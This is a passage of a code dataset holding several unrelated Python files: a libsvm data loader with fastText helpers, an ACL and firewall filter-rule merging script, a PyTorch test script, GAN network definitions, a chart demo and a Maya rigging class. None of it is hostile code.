tqdm(total=num_documents, desc=f'libsvm to csr for {path}') as pb:\n\n for i, line in enumerate(f_in):\n labels, *features = line.strip().split()\n\n features = [item.split(\":\") for item in features]\n labels = [int(y) for y in labels.split(',')]\n\n if len(features) == 0:\n row_indices, row_values = [], []\n\n else:\n row_indices, row_values = zip(*features)\n row_indices, row_values = map(int, row_indices), map(float, row_values)\n\n x_indices.extend(row_indices)\n x_data.extend(row_values)\n x_indptr.append(len(x_indices))\n\n y_indices.extend(labels)\n y_indptr.append(len(y_indices))\n\n pb.update(1)\n\n x_indices = np.frombuffer(x_indices, dtype=np.uint32)\n x_indptr = np.frombuffer(x_indptr, dtype=np.uint32)\n x_data = 
np.frombuffer(x_data, dtype=np.float32)\n x_shape = (num_documents, num_features)\n\n y_indices = np.frombuffer(y_indices, dtype=np.uint32)\n y_indptr = np.frombuffer(y_indptr, dtype=np.uint32)\n y_data = np.ones_like(y_indices, dtype=np.float32)\n y_shape = (num_documents, num_labels)\n\n X = sp.csr_matrix((x_data, x_indices, x_indptr), shape=x_shape)\n Y = sp.csr_matrix((y_data, y_indices, y_indptr), shape=y_shape)\n\n return X, Y\n\n\ndef trim(_X, dim, t):\n _X = _X.tocsc() if (dim == 0) else _X.tocsr()\n _mask = np.array((_X > 0).sum(dim) >= t).ravel()\n\n return _mask\n\n\ndef load_libsvm(path, name='train', force=False, min_words=1, min_labels=1, words_mask=None, labels_mask=None):\n\n # data paths\n RAW_PATH = os.path.join(path, f'{name}.txt')\n X_PATH = os.path.join(path, f'X_{name}.csr.npz')\n Y_PATH = os.path.join(path, f'Y_{name}.csr.npz')\n\n # data already read\n if os.path.exists(X_PATH) and force is False:\n logger.info(f\"Data already present at {X_PATH}. Loading...\")\n\n X = load_csr(X_PATH)\n Y = load_csr(Y_PATH)\n\n return X, Y, None, None\n\n # data only in libsvm\n logger.info(f\"Data not found or `force` flag was passed.\")\n logger.debug(f\"I'm going to prepare_ft it and store at {X_PATH}.\")\n\n X, Y = libsvm_to_csr(RAW_PATH)\n\n logger.debug('# compute masks to get rid of examples with too little words or labels')\n if words_mask is None:\n words_mask = trim(X, dim=0, t=min_words)\n labels_mask = trim(Y, dim=0, t=min_labels)\n\n logger.debug('# discard unwanted columns')\n X = X.tocsc()[:, words_mask].tocsr()\n Y = Y.tocsc()[:, labels_mask].tocsr()\n\n logger.debug('# make sure each example has at leas one nonzero feature and one label')\n row_mask = trim(X, dim=1, t=1) & trim(Y, dim=1, t=1)\n X = X[row_mask, :] # type: sp.csr_matrix\n Y = Y[row_mask, :]\n\n logger.debug('# fix csr matrices')\n X.sort_indices()\n X.sum_duplicates()\n Y.sort_indices()\n Y.sum_duplicates()\n\n logger.debug('# save the result')\n save_csr(X, X_PATH)\n save_csr(Y, Y_PATH)\n\n return X, Y, words_mask, labels_mask\n\n\ndef to_ft(X: sp.csr_matrix, Y: sp.csr_matrix, fname: str):\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n\n with open(fname, 'w') as f:\n for row_x, row_y in tqdm(zip(X, Y), total=X.shape[0], desc=f'to_ft ({fname})'):\n xs, ys = row_x.indices, row_y.indices\n\n labels = [f'__label__{y}' for y in ys]\n feats = [f'feature_{x}' for x in xs]\n\n line = ' '.join(labels + feats)\n\n print(line, file=f)\n\n\ndef _fasttext_cmd(path, *args, **kwargs):\n args = ' '.join(args)\n opts = ' '.join(f'-{k} {v}' for k, v in kwargs.items())\n cmd = f'{path} {args} {opts}'\n\n return cmd.split()\n\n\ndef make_ft_fvecs(fasttext, path, thread):\n path = str(path)\n\n train_cmd = _fasttext_cmd(fasttext, 'supervised',\n input=os.path.join(path, 'train.ft.txt'),\n output=os.path.join(path, 'model.ft'),\n minCount=3,\n minCountLabel=3,\n lr=0.1,\n lrUpdateRate=100,\n dim=256,\n ws=5,\n epoch=25,\n neg=25,\n loss='ns',\n thread=thread,\n saveOutput=1)\n\n generate_cmd = _fasttext_cmd(fasttext, 'to-fvecs',\n os.path.join(path, 'model.ft.bin'),\n os.path.join(path, 'test.ft.txt'),\n os.path.join(path, 'data'))\n\n subprocess.call(train_cmd)\n subprocess.call(generate_cmd)\n\n\ndef save_csr(obj, filename):\n np.savez(filename, data=obj.data, indices=obj.indices, indptr=obj.indptr,\n shape=obj.shape)\n\n\ndef load_csr(filename: str):\n loader = np._load(filename)\n\n data = loader['data']\n indices = loader['indices']\n indptr = loader['indptr']\n shape = loader['shape']\n\n return 
sp.csr_matrix((data, indices, indptr),\n shape=shape)\n#\n#\n# def _load(path):\n# logger.debug(f'Loading {path}')\n#\n# xt = load_sift(join(path, \"sift_learn.fvecs\"))\n# xb = load_sift(join(path, \"sift_base.fvecs\"))\n# xq = load_sift(join(path, \"sift_query.fvecs\"))\n# gt = load_sift(join(path, \"sift_groundtruth.ivecs\"), dtype=np.int32)\n#\n# return xt, xb, xq, gt\n#\n#\n# def _save(I, path):\n# logger.debug(f'saving {GT_IP_FNAME}')\n# save_sift(I, join(path, GT_IP_FNAME), dtype=np.int32)\n#\n# logger.debug(f'saving {GT_IP_TXT}')\n# with open(join(path, GT_IP_TXT), 'w') as f:\n#\n# for row in tqdm(I):\n# row = ' '.join([str(item) for item in row])\n# print(row, file=f)\n#\n#\n# def _eval(index, xq, gt, prefix=\"\"):\n# nq, k_max = gt.shape\n#\n# for k in [1, 5, 10]:\n# t0 = time.time()\n# D, I = index.search(xq, k)\n# t1 = time.time()\n#\n# recall_at_1 = (I[:, :1] == gt[:, :1]).sum() / float(nq)\n#\n# print('\\t' + prefix + \": k={} {:.3f} s, R@1 {:.4f}\".format(k, t1 - t0, recall_at_1))\n#\n#\n# def _test_gt(data):\n# logger.debug('Testing')\n#\n# xt, xb, xq, gt = data\n#\n# d = xt.shape[1]\n#\n# for Index in [faiss.IndexFlatIP, faiss.IndexFlatL2]:\n# index = Index(d)\n# index.add(xb)\n#\n# _eval(index, xq, gt, prefix=index.__class__.__name__)\n","sub_path":"python/pymips/utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":10466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"442464312","text":"#!/usr/bin/python\r\n#coding=utf-8\r\nimport os\r\nimport re\r\nfrom operator import itemgetter,attrgetter\r\nfrom _random import Random\r\nimport random\r\n\r\n# print(os.name)\r\n\r\n\r\nclass IPDATA_PROC:\r\n\r\n # 32+32+16+16\r\n# pattern=re.compile(r'\\@\\s*(\\d+)\\.(\\d+).(\\d+).(\\d+)\\/(\\d+)\\s*(\\d+)\\.(\\d+).(\\d+).(\\d+)\\/(\\d+)\\s*(\\d+)\\s*\\:\\s*(\\d+)\\s*(\\d+)\\s*\\:\\s*(\\d+)')\r\n \r\n # 32+32+16+16_8_16\r\n pattern=re.compile(r'\\@\\s*(\\d+)\\.(\\d+).(\\d+).(\\d+)\\/(\\d+)\\s*(\\d+)\\.(\\d+).(\\d+).(\\d+)\\/(\\d+)\\s*(\\d+)\\s*\\:\\s*(\\d+)\\s*(\\d+)\\s*\\:\\s*(\\d+)\\s*(\\w+)\\/(\\w+)\\s*(\\w+)\\/(\\w+)')\r\n\r\n def __init__(self):\r\n self.rule_set=[] \r\n self.merge_set=[] \r\n\r\n \r\n def TransFormat(self,m1): \r\n '''\r\n \r\n :param m1:match\r\n \r\n retue rule 6 feilds\r\n \r\n '''\r\n \r\n for x in range(0,6,5):\r\n ip1=int(m1.group(x+1))<<24 & 0xFF000000\r\n ip2=int(m1.group(x+2))<<16 & 0x00FF0000\r\n ip3=int(m1.group(x+3))<<8 & 0x0000FF00\r\n ip4=int(m1.group(x+4)) & 0x000000FF\r\n tmask=int(m1.group(x+5))\r\n tmpdip=(ip1 | ip2 | ip3 | ip4)\r\n \r\n if(tmask < 32):\r\n mask=2**(32-tmask)-1\r\n ipend=tmpdip | mask\r\n ipstart= tmpdip & (~mask)\r\n else:\r\n ipend=tmpdip\r\n ipstart=tmpdip\r\n \r\n H16_ipstart=str((ipstart >> 16) & 0xFFFF)\r\n H16_ipend=str((ipend >> 16) & 0xFFFF)\r\n \r\n L16_ipstart=str(ipstart & 0xFFFF)\r\n L16_ipend=str(ipend & 0xFFFF)\r\n\r\n for x in range(11,14,2):\r\n dport_start=m1.group(x)\r\n dport_end=m1.group(x+1)\r\n \r\n rule=(H16_ipstart,H16_ipend,L16_ipstart,L16_ipend,dport_start,dport_end)\r\n \r\n return rule\r\n \r\n def ReadFilterSet(self,file_name):\r\n\r\n with open(file_name, mode='r') as handle: \r\n for line in handle.readlines(): \r\n\r\n # m1=re.search(r'(\\d+\\.\\d+\\.\\d+\\.\\d+\\/d+\\s\\d+\\.\\d+\\.\\d+\\.\\d+)',strings)\r\n m1=re.match(self.pattern,line)\r\n if m1:\r\n# print(m1.group(0))\r\n# print(m1.group(18))\r\n rule=[]\r\n for x in range(1, 15): \r\n rule.append(int(m1.group(x)))\r\n for x in range(15, 19): \r\n 
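                        # regex groups 15-18 appear to capture the two hex
                        # value/mask pairs at the end of each rule (e.g.
                        # 0x06/0xFF in ClassBench-style filters), hence the
                        # explicit base-16 int() conversion below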
rule.append(int(m1.group(x),16))\r\n \r\n# rule=tuple(rule)\r\n# print(rule)\r\n# print(len(rule))\r\n self.rule_set.append(rule)\r\n\r\n\r\n else:\r\n print(\"no match rules...\")\r\n\r\n return\r\n \r\n def SortMerge(self,tot):\r\n \r\n tmp_set=[]\r\n \r\n for x in range(0,tot):\r\n indx=random.randint(0,len(self.rule_set)-1)\r\n tmp_set.append(self.rule_set[indx])\r\n \r\n print(\"len(tmp_set) is \",len(tmp_set))\r\n \r\n #group(4)group(9) is mask\r\n # 11-10 13-12 15-14 17-16\r\n for rule in tmp_set:\r\n rule.append(rule[11]-rule[10])\r\n rule.append(rule[13]-rule[12])\r\n rule.append(rule[15]-rule[14])\r\n rule.append(rule[17]-rule[16])\r\n \r\n \r\n # 4,9 is mask\r\n # 18 19 20 21 is range\r\n tmp_set=sorted(tmp_set,key=itemgetter(18,19,20,21),reverse=False)\r\n tmp_set=sorted(tmp_set,key=itemgetter(4,9),reverse=True)\r\n\r\n cmp=None\r\n for x in tmp_set: \r\n if x!=cmp:\r\n cmp=x\r\n self.merge_set.append(x)\r\n# print(x)\r\n\r\n return \r\n \r\n def WriteMergeSet(self,file_name):\r\n \r\n with open(file_name,mode=\"w\") as handle:\r\n for rule in self.merge_set:\r\n \r\n# print(rule)\r\n# handle.write(str(rule[4])+\" \"+str(rule[9])+\"\\n\")\r\n handle.write(\"@ \") \r\n handle.write(str(rule[0])+\".\")\r\n handle.write(str(rule[1])+\".\")\r\n handle.write(str(rule[2])+\".\")\r\n handle.write(str(rule[3])+\"/\")\r\n handle.write(str(rule[4])+\" \")\r\n handle.write(str(rule[5])+\".\")\r\n handle.write(str(rule[6])+\".\")\r\n handle.write(str(rule[7])+\".\")\r\n handle.write(str(rule[8])+\"/\")\r\n handle.write(str(rule[9])+\" \") \r\n handle.write(str(rule[10])+\":\")\r\n handle.write(str(rule[11])+\" \")\r\n handle.write(str(rule[12])+\":\")\r\n handle.write(str(rule[13])+\" \")\r\n handle.write(str(hex(rule[14]))+\"/\")\r\n handle.write(str(hex(rule[15]))+\" \")\r\n handle.write(str(hex(rule[16]))+\"/\")\r\n handle.write(str(hex(rule[17]))+\"\\n\")\r\n \r\n return\r\n \r\nif __name__ == \"__main__\":\r\n\r\n \r\n proc=IPDATA_PROC()\r\n proc.ReadFilterSet(\"table_acl1_10k\")\r\n proc.ReadFilterSet(\"table_acl2_10k\")\r\n proc.ReadFilterSet(\"table_acl3_10k\")\r\n proc.ReadFilterSet(\"table_acl4_10k\")\r\n proc.ReadFilterSet(\"table_acl5_10k\")\r\n proc.ReadFilterSet(\"table_fw1_10k\")\r\n proc.ReadFilterSet(\"table_fw2_10k\")\r\n proc.ReadFilterSet(\"table_fw3_10k\")\r\n proc.ReadFilterSet(\"table_fw4_10k\")\r\n proc.ReadFilterSet(\"table_fw5_10k\")\r\n proc.ReadFilterSet(\"table_ipc1_10k\")\r\n proc.ReadFilterSet(\"table_ipc2_10k\")\r\n \r\n \r\n proc.SortMerge(1*1024)\r\n proc.WriteMergeSet(\"out.txt\")\r\n print(\"len(proc.rule_set) is %d\" % len(proc.rule_set))\r\n print(\"len(proc.merge_set) is %d\" % len(proc.merge_set))\r\n \r\n\r\n","sub_path":"pyDemo/DataProc/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":5795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"648669590","text":"import nets\nfrom macros import *\nimport torch\nimport utils\nimport opts\nimport argparse\nimport training\nfrom torch import nn\nfrom torch import optim\nfrom tasks import prop_entailment, \\\n prop_entailment_2enc, \\\n rewriting, \\\n rte, \\\n scan, \\\n pattern\n\n\nif __name__ == '__main__':\n parser = argparse. 
\\\n ArgumentParser(description='main.py',\n formatter_class=argparse.\n ArgumentDefaultsHelpFormatter)\n\n opts.model_opts(parser)\n opts.train_opts(parser)\n opt = parser.parse_args()\n\n utils.init_seed(opt.seed)\n\n build_iters = None\n train = None\n valid = None\n Model = None\n criterion = None\n if opt.task == 'prop-entail':\n build_iters = prop_entailment.build_iters\n train = prop_entailment.train\n valid = prop_entailment.valid\n Model = prop_entailment.Model\n\n if opt.task == 'prop-entail-2enc':\n build_iters = prop_entailment_2enc.build_iters\n train = prop_entailment_2enc.train\n valid = prop_entailment_2enc.valid\n Model = prop_entailment_2enc.Model\n\n if opt.task == 'rewriting':\n build_iters = rewriting.build_iters\n train = rewriting.train\n valid = rewriting.valid\n Model = rewriting.Model\n\n if opt.task == 'rte':\n build_iters = rte.build_iters\n train = rte.train\n valid = rte.valid\n Model = rte.Model\n\n if opt.task == 'scan':\n build_iters = scan.build_iters\n train = scan.train\n valid = scan.valid\n Model = scan.Model\n\n if opt.task == 'pattern':\n build_iters = pattern.build_iters\n train = pattern.train\n valid = pattern.valid\n Model = pattern.Model\n\n param_iter = {'ftrain': opt.ftrain,\n 'fvalid': opt.fvalid,\n 'bsz': opt.bsz,\n 'device': opt.gpu,\n 'sub_task': opt.sub_task,\n 'num_batches_train': opt.num_batches_train,\n 'num_batches_valid': opt.num_batches_valid,\n 'min_len_train': opt.min_len_train,\n 'min_len_valid': opt.min_len_valid,\n 'max_len_train': opt.max_len_train,\n 'max_len_valid': opt.max_len_valid,\n 'repeat_min_train': opt.repeat_min_train,\n 'repeat_max_train': opt.repeat_max_train,\n 'repeat_min_valid': opt.repeat_min_valid,\n 'repeat_max_valid': opt.repeat_max_valid,\n 'seq_width': opt.seq_width}\n\n res_iters = build_iters(param_iter)\n\n embedding = None\n embedding_enc = None\n embedding_dec = None\n SEQ = None\n SRC = None\n TAR = None\n if 'SEQ' in res_iters.keys():\n SEQ = res_iters['SEQ']\n embedding = nn.Embedding(num_embeddings=len(SEQ.vocab.itos),\n embedding_dim=opt.edim,\n padding_idx=SEQ.vocab.stoi[PAD])\n\n if 'SRC' in res_iters.keys() and 'TAR' in res_iters.keys():\n SRC = res_iters['SRC']\n embedding_enc = nn.Embedding(num_embeddings=len(SRC.vocab.itos),\n embedding_dim=opt.edim,\n padding_idx=SRC.vocab.stoi[PAD])\n\n TAR = res_iters['TAR']\n embedding_dec = nn.Embedding(num_embeddings=len(TAR.vocab.itos),\n embedding_dim=opt.edim,\n padding_idx=TAR.vocab.stoi[PAD])\n\n location = opt.gpu if torch.cuda.is_available() and opt.gpu != -1 else 'cpu'\n device = torch.device(location)\n\n if opt.emb_type == 'one-hot':\n if embedding is not None:\n one_hot_mtrx = utils.one_hot_matrix(SEQ.vocab.stoi, device, opt.edim)\n embedding.weight.data.copy_(one_hot_mtrx)\n embedding.weight.requires_grad = False\n\n if embedding_enc is not None:\n one_hot_mtrx = utils.one_hot_matrix(SRC.vocab.stoi, device, opt.edim)\n embedding_enc.weight.data.copy_(one_hot_mtrx)\n embedding_enc.weight.requires_grad = False\n\n if embedding_dec is not None:\n one_hot_mtrx = utils.one_hot_matrix(TAR.vocab.stoi, device, opt.edim)\n embedding_dec.weight.data.copy_(one_hot_mtrx)\n embedding_dec.weight.requires_grad = False\n\n encoder = None\n decoder = None\n if opt.enc_type == 'simp-rnn':\n encoder = nets.EncoderSimpRNN(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.enc_type == 'lstm':\n encoder = nets.EncoderLSTM(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.enc_type == 'alstm':\n encoder = 
nets.EncoderALSTM(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.enc_type == 'ntm':\n encoder = nets.EncoderNTM(idim=opt.edim,\n cdim=opt.hdim,\n num_heads=opt.num_heads,\n N=opt.N,\n M=opt.M)\n if opt.enc_type == 'dnc':\n encoder = nets.EncoderDNC(idim=opt.edim,\n cdim=opt.hdim,\n num_heads=opt.num_heads,\n N=opt.N,\n M=opt.M,\n gpu=opt.gpu)\n if opt.enc_type == 'sarnn':\n encoder = nets.EncoderSARNN(idim=opt.edim,\n hdim=opt.hdim,\n nstack=opt.nstack,\n stack_size=opt.stack_size,\n sdim=opt.sdim,\n sdepth=opt.stack_depth)\n if opt.enc_type == 'nse':\n encoder = nets.EncoderNSE(idim=opt.edim,\n dropout=opt.dropout,\n N=opt.N)\n\n if opt.enc_type == 'tardis':\n a = int(opt.M * opt.a_ratio)\n c = opt.M - a\n encoder = nets.EncoderTARDIS(idim=opt.edim,\n hdim=opt.hdim,\n N=opt.N,\n a=a,\n c=c,\n is_soft=opt.soft_enc)\n\n if opt.dec_type == 'simp-rnn':\n decoder = nets.DecoderSimpRNN(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.dec_type == 'lstm':\n decoder = nets.DecoderLSTM(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.dec_type == 'alstm':\n decoder = nets.DecoderALSTM(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.dec_type == 'ntm':\n decoder = nets.DecoderNTM(idim=opt.edim,\n cdim=opt.hdim,\n num_heads=opt.num_heads,\n N=opt.N,\n M=opt.M)\n\n if opt.dec_type == 'sarnn':\n decoder = nets.DecoderSARNN(idim=opt.edim,\n hdim=opt.hdim,\n nstack=opt.nstack,\n stack_size=opt.stack_size,\n sdim=opt.sdim,\n sdepth=opt.stack_depth)\n\n if opt.dec_type == 'nse':\n decoder = nets.DecoderNSE(idim=opt.edim,\n N=opt.N,\n dropout=opt.dropout)\n\n if opt.dec_type == 'tardis':\n a = int(opt.M * opt.a_ratio)\n c = opt.M - a\n decoder = nets.DecoderTARDIS(idim=opt.edim,\n hdim=opt.hdim,\n N=opt.N,\n a=a,\n c=c,\n is_soft=opt.soft_dec)\n\n model = None\n if TAR is None:\n if embedding is None:\n model = Model(encoder, opt.odim).to(device)\n else:\n model = Model(encoder, embedding).to(device)\n utils.init_model(model)\n else:\n model = Model(encoder, decoder,\n embedding_enc, embedding_dec,\n TAR.vocab.stoi[SOS]).to(device)\n utils.init_model(model)\n\n if opt.fload is not None:\n model_fname = opt.fload\n location = {'cuda:' + str(opt.gpu): 'cuda:' + str(opt.gpu)} if opt.gpu != -1 else 'cpu'\n model_path = os.path.join(RES, model_fname)\n model_dict = torch.load(model_path, map_location=location)\n model.load_state_dict(model_dict)\n print('Loaded from ' + model_path)\n\n if TAR is None:\n criterion = nn.CrossEntropyLoss()\n else:\n criterion = nn.CrossEntropyLoss(ignore_index=TAR.vocab.stoi[PAD])\n\n if opt.task == 'pattern':\n criterion = nn.BCELoss()\n\n optimizer = optim.Adam(params=filter(lambda p: p.requires_grad, model.parameters()),\n lr=opt.lr,\n weight_decay=opt.wdecay)\n # optimizer = optim.SGD(params=filter(lambda p: p.requires_grad, model.parameters()),\n # lr=opt.lr,\n # weight_decay=opt.wdecay)\n # optimizer = optim.RMSprop(params=filter(lambda p: p.requires_grad, model.parameters()),\n # momentum=0.9,\n # alpha=0.95,\n # lr=1e-4)\n\n param_str = utils.param_str(opt)\n for key, val in param_str.items():\n print(str(key) + ': ' + str(val))\n\n print(valid(model, res_iters['valid_iter'], res_iters['rewriting_map']))\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"367818121","text":"import torch\nfrom torch import nn\n\nfrom utils import get_config\nfrom _layers import 
ResBlockDownsample, Conv2dBlock, Conv2dUpsampleBlock\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_nc, config_dis):\n super(Discriminator, self).__init__()\n\n input_nc = input_nc\n dim = config_dis['dim']\n norm = config_dis['norm']\n activation = config_dis['activation']\n n_layer = config_dis['n_layer']\n pad_type = config_dis['pad_type']\n self.num_scales = config_dis['num_scales']\n\n self.blocks = []\n for scale in range(self.num_scales):\n block = self.build_block(input_nc, dim // (2 ** scale), norm, activation, n_layer, pad_type)\n self.add_module('model_{}'.format(scale), block)\n\n def build_block(self, input_nc, dim, norm, activation, n_layer, pad_type):\n layers = []\n layers += [Conv2dBlock(input_nc, dim, 7, 2, 3, 'none', activation, pad_type)]\n for i in range(n_layer - 1):\n layers += [Conv2dBlock(dim, dim * 2, 4, 2, 1, norm, activation, pad_type)]\n dim *= 2\n\n layers += [Conv2dBlock(dim, 1, 4, 2, 1, 'none', 'none', pad_type)]\n return nn.Sequential(*layers)\n\n def forward(self, x):\n logits = []\n for scale in range(self.num_scales):\n model = getattr(self, \"model_{}\".format(scale))\n logits += [model(x)]\n x = nn.AvgPool2d(2)(x)\n return logits\n\n\nclass Generator(nn.Module):\n def __init__(self, input_dim, config_gen): # *a, **k : norm, activation, pad_type\n super(Generator, self).__init__()\n\n dim = config_gen['dim']\n dim_latent = config_gen['dim_latent']\n n_blocks = config_gen['n_unet_block']\n norm = config_gen['norm']\n activation = config_gen['activation']\n upsample = config_gen['upsample']\n pad_type = config_gen['pad_type']\n\n dim = min(dim * (2 ** (n_blocks - 1)), 512)\n\n submodule = SkipConnectionBlockNoiseAll(dim, dim, dim_latent, None, 'innermost', upsample, norm, activation,\n pad_type)\n for _ in range(3):\n submodule = SkipConnectionBlockNoiseAll(dim, dim, dim_latent, submodule, 'middle', upsample, norm,\n activation, pad_type)\n\n for _ in range(n_blocks - 5):\n dim //= 2\n submodule = SkipConnectionBlockNoiseAll(dim, dim * 2, dim_latent, submodule, 'middle', upsample, norm,\n activation, pad_type)\n\n submodule = SkipConnectionBlockNoiseAll(input_dim, dim, dim_latent, submodule, 'outermost', upsample, norm, activation,\n pad_type)\n\n self.model = submodule\n\n def forward(self, x, z):\n return self.model(x, z)\n\n\nclass SkipConnectionBlockNoiseAll(nn.Module):\n def __init__(self, input_dim, inner_dim, latent_dim, submodule, position,\n upsample_mode='nearest', norm='in', activation='lrelu', pad_type='zero'): # pad_type should not 'reflect' or 'replicate'\n super(SkipConnectionBlockNoiseAll, self).__init__()\n self.inner_dim = inner_dim\n self.submodule = submodule\n self.position = position\n\n self.tmp = input_dim + latent_dim\n\n if position == 'outermost':\n self.down = Conv2dBlock(input_dim + latent_dim, inner_dim, 3, stride=1, padding=1, norm='none', activation=activation, pad_type=pad_type)\n self.submodule = submodule\n self.up = Conv2dBlock(self.skip_connected_dim(), input_dim, 3, stride=1, padding=1, norm='none', activation='tanh', pad_type=pad_type)\n\n elif position == 'middle':\n self.down = Conv2dBlock(input_dim + latent_dim, inner_dim, 4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)\n self.submodule = submodule\n self.up = Conv2dUpsampleBlock(self.skip_connected_dim(), input_dim, upsample_mode, 3, padding=1, norm=norm, activation='relu',\n pad_type=pad_type)\n\n elif position == 'innermost':\n assert not submodule, 'No skip connection for innermost layer'\n self.down = 
Conv2dBlock(input_dim + latent_dim, inner_dim, 4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)\n self.up = Conv2dUpsampleBlock(inner_dim, input_dim, upsample_mode, 3, padding=1, norm=norm, activation='relu', pad_type=pad_type)\n\n else:\n raise NotImplementedError(\"Unsupported unet position: {}\".format(position))\n\n self.output_dim = input_dim\n\n def skip_connected_dim(self):\n return self.submodule.output_dim + self.inner_dim\n\n def forward(self, x, z):\n z_repeat = z.view(z.size(0), -1, 1, 1).repeat(1, 1, x.size(2), x.size(3))\n x_z = torch.cat([x, z_repeat], 1)\n\n if self.position == 'outermost':\n logit = self.down(x_z)\n logit = self.submodule(logit, z)\n logit = self.up(logit)\n return logit\n if self.position == 'middle':\n logit = self.down(x_z)\n logit = self.submodule(logit, z)\n logit = self.up(logit)\n return torch.cat([logit, x], 1)\n\n else: # innermost\n logit = self.down(x_z)\n logit = self.up(logit)\n return torch.cat([logit, x], 1)\n\n\nclass Encoder(nn.Module): # TODO : to ResNet / VAE like?\n def __init__(self, input_dim, config_enc):\n super(Encoder, self).__init__()\n\n dim_out = config_enc['dim']\n self.dim_latent = config_enc['dim_latent']\n n_down = config_enc['n_downsample']\n norm = config_enc['norm']\n activation = config_enc['activation']\n pad_type = config_enc['pad_type']\n\n layers = []\n layers += [Conv2dBlock(input_dim, dim_out, 7, 2, 3, 'none', activation, pad_type)]\n for _ in range(1, n_down):\n dim_in = dim_out\n dim_out = min(dim_out * 2, 256)\n layers += [ResBlockDownsample(dim_in, dim_out, 3, 2, 1, norm, activation, pad_type, 'avg')]\n\n layers += [nn.AdaptiveAvgPool2d(1)]\n self.conv_mu = Conv2dBlock(dim_out, self.dim_latent, kernel_size=1, stride=1, padding=0, norm='none', activation='none')\n self.conv_sigma = Conv2dBlock(dim_out, self.dim_latent, kernel_size=1, stride=1, padding=0, norm='none', activation='none')\n\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n logit = self.model(x)\n\n mu = self.conv_mu(logit).view(logit.size(0), self.dim_latent)\n log_sigma = self.conv_sigma(logit).view(logit.size(0), self.dim_latent)\n return mu, log_sigma\n\n","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"118473511","text":"import pygal\nfrom pyecharts import Map\n\n\nbar_chart = pygal.Bar()\nbar_chart.add('Fibonacci', [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55])\nbar_chart.render_to_file('Hello.svg')\n\n'''\nline_chart = pygal.Line()\nline_chart.title = 'Browser usage evolution (in %)'\nline_chart.x_labels = map(str, range(2002, 2013))\nline_chart.add('Firefox', [None, None, 0, 16.6, 25, 31, 36.4, 45.5, 46.3, 42.8, 37.1])\nline_chart.add('Chrome', [None, None, None, None, None, None, 0, 3.9, 10.8, 23.8, 35.3])\nline_chart.add('IE', [85.8, 84.6, 84.7, 74.5, 66, 58.6, 54.7, 44.8, 36.2, 26.6, 20.1])\nline_chart.add('Others', [14.2, 15.4, 15.3, 8.9, 9, 10.4, 8.9, 5.8, 6.7, 6.8, 7.5])\nline_chart.render_to_file('Hello_line_chart.svg')\n'''\n\nvalue = [78, 72, 65, 95, 85, 81, 50 ,90]\nattr = [\"江苏\", \"山东\", \"安徽\", \"上海\", \"浙江\", \"广东\", \"四川\", \"北京\"]\nmap = Map(\"年轻族群生活形态城市分布\", width=1200, height=600)\nmap.add(\"\", attr, value, maptype='china', is_visualmap=True, 
visual_text_color='#000')\nmap.show_config()\nmap.render()\n\n","sub_path":"map/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"413329397","text":"\n\nimport pymel.core as pm\n\nimport Abstracts.Abstract_Behavior as absBhv\nimport Utilities.Rig_Utilities as rigUtil\n\nimport Utilities.Logger as log\nimport SceneData.Joint as jnt\n\nclass Empty_01(absBhv.Abstract_Behavior):\n bhvType = 'Empty1'\n validLimbTypes = (0,) # rigData.LIMB_TYPES\n groupType = 'Empty' # LookAt, IKPV...\n groupShape = 'Square_Wire'\n groupCount = 1\n groupMoveable = True # for moving control pivots\n uiOrderIndex = 110 \n usesJointControls = False\n usesLimbControls = True\n bakeLosesData = False\n duplicateJointGroups = False\n \n def InitLimb(self, limb):\n log.funcFileDebug()\n pm.select(d=1)\n if pm.listConnections(limb.joints):\n return\n joint = pm.joint()\n rigRoot = pm.listConnections(limb.rigRoot)[0]\n jnt.Joint.Add(rigRoot, 0, limb, joint)\n joint.pfrsName.set(self.groupType)\n joint.v.set(0)\n jointGroup = pm.listConnections(joint.group)[0]\n jointGroup.v.set(0)\n jointParentGroup = pm.listConnections(rigRoot.jointsParentGroup)[0]\n pm.parent(joint, jointParentGroup)\n \n def CleanupLimb(self, limb):\n log.funcFileDebug()\n joint = pm.listConnections(limb.joints)[0]\n jnt.Joint.Delete(joint)\n \n#============= FOR BEHAVIOR OPERATION ============================\n\n def Setup_ForBhvOp(self, limb):\n pass\n \n def Teardown_ForBhvOp(self, limb):\n pass\n \n#============= SETUP ============================\n\n def Setup_Rig_Controls(self, limb):\n log.funcFileDebug()\n parentControl = rigUtil.GetParentControl(limb)\n group = rigUtil.GetLimbGroups(limb, self.groupType)[0]\n if parentControl:\n pm.parentConstraint(parentControl, group, mo=1)\n \n def Setup_Constraint_JointsToControls(self, limb):\n log.funcFileDebug()\n limbGroup = rigUtil.GetLimbGroups(limb, self.groupType)[0]\n joint = pm.listConnections(limb.joints)[0]\n control = pm.listConnections(limbGroup.control)[0]\n pm.parentConstraint(control, joint)\n jointGroup = pm.listConnections(joint.group)[0]\n pm.parent(jointGroup, joint)\n # pm.parentConstraint(joint, 